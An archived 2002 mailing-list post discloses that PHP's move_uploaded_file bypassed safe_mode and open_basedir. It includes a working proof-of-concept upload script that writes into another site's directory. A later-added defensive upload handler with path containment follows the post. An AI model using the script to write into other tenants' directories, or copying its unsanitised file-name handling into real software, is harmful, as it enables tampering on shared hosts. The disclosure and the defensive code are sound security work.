move_uploaded_file breaks safe_mode restrictions in PHP

From: Tozz (tozzat_private)
Date: Sun Mar 17 2002 - 14:23:34 PST


    Hey
    
    It's possible to circumvent (probably spelled wrong) PHP safe_mode
    restrictions by using move_uploaded_file.
    
    You take this nasty script (and you have the domain whatever.com and your
    directory path is /domains/whatever.com/):
    
    <?php
    
    // PHP 4 names: $HTTP_POST_FILES is $_FILES and $PHP_SELF is
    // $_SERVER['PHP_SELF'] in later releases.
    $file = $HTTP_POST_FILES['file']['name'];
    $type = $HTTP_POST_FILES['file']['type'];
    $size = $HTTP_POST_FILES['file']['size'];
    $temp = $HTTP_POST_FILES['file']['tmp_name'];
    
    $size_limit = "100000"; // set size limit in bytes
    
    if ($file) {
        if ($size < $size_limit) {
            // The destination is outside this vhost's open_basedir, yet
            // move_uploaded_file() performs the move anyway.
            move_uploaded_file($temp,
                "/domains/somebodyelse.org/public_html/www/test/" . $file);
            echo "The file <tt>$file</tt> was successfully uploaded";
        } else {
            echo "Sorry, your file exceeds the size limit of $size_limit bytes";
        }
    }
    
    echo "
    <form enctype='multipart/form-data' action=$PHP_SELF method=post>
    Upload a file: <input name='file' type='file'>
    <input type='submit' value='Upload'>
    </form>
    ";
    ?>
    
    As you can see, he moved the uploaded file to:
    "/domains/somebodyelse.org/public_html/www/test/" while the user is
    restricted with both safe_mode and open_basedir.
    
    Virtualhost configuration snippet:
    
    <VirtualHost IP_HERE>
            DocumentRoot /domains/whatever.com/public_html/root/
            ServerName root.whatever.com
            CustomLog /domains/whatever.com/logs/access_log combined
            ErrorLog /domains/whatever.com/logs/error_log
            php_admin_value safe_mode 1
            php_admin_value open_basedir /domains/whatever.com/public_html/root/
    </VirtualHost>
    
    As you can see I have set both safe_mode and the open_basedir
    restriction, but this user is able to upload any file anywhere the Apache
    user has write access.
    
    PHP.net has been notified, and the bug has been fixed in CVS. However, I am unable
    to compile the CVS version at the moment. It gives a lot of 'make' errors. Thanks go out
    to bastijs for pointing this out to me.
    
    Bye,
    Tozz
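As an added defensive example (this is not code from Tozz's post or from PHP itself), here is an upload handler that pins the destination directory in application code, so it does not depend on move_uploaded_file() honouring safe_mode or open_basedir; the upload directory path is an assumed placeholder.

```php
<?php
// Added example: application-level containment for uploads. Assumed
// upload directory (placeholder), under the vhost's own document root.
define('UPLOAD_DIR', '/domains/whatever.com/public_html/root/uploads');

// Returns an absolute destination path inside $baseDir, or null if the
// client-supplied name cannot be safely used.
function safe_upload_destination(string $clientName, string $baseDir): ?string
{
    // Keep only the last path component; "../../x" becomes "x".
    $name = basename(str_replace('\\', '/', $clientName));
    // Conservative character set: no separators, NUL bytes or leading dots.
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false || !is_dir($base)) {
        return null;
    }
    $dest = $base . DIRECTORY_SEPARATOR . $name;
    // Final containment check: the parent directory must resolve to $base.
    if (realpath(dirname($dest)) !== $base) {
        return null;
    }
    return $dest;
}

function handle_upload(array $upload, string $baseDir, int $sizeLimit): string
{
    if (!isset($upload['tmp_name']) || $upload['error'] !== UPLOAD_ERR_OK) {
        return 'Upload failed';
    }
    if ($upload['size'] > $sizeLimit) {
        return "Sorry, your file exceeds the size limit of $sizeLimit bytes";
    }
    // Refuse any source path that this request's upload did not create.
    if (!is_uploaded_file($upload['tmp_name'])) {
        return 'Not an uploaded file';
    }
    $dest = safe_upload_destination($upload['name'], $baseDir);
    if ($dest === null || file_exists($dest)) {
        return 'Rejected file name';
    }
    if (!move_uploaded_file($upload['tmp_name'], $dest)) {
        return 'Could not store file';
    }
    return 'The file ' . htmlspecialchars(basename($dest)) . ' was successfully uploaded';
}

if (isset($_FILES['file'])) {
    echo handle_upload($_FILES['file'], UPLOAD_DIR, 100000);
}
```

The containment check does not replace the interpreter fix Tozz mentions; it limits what a script in this vhost can reach even where the interpreter's restrictions are missing.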
    



    This archive was generated by hypermail 2b30 : Tue Mar 19 2002 - 19:34:48 PST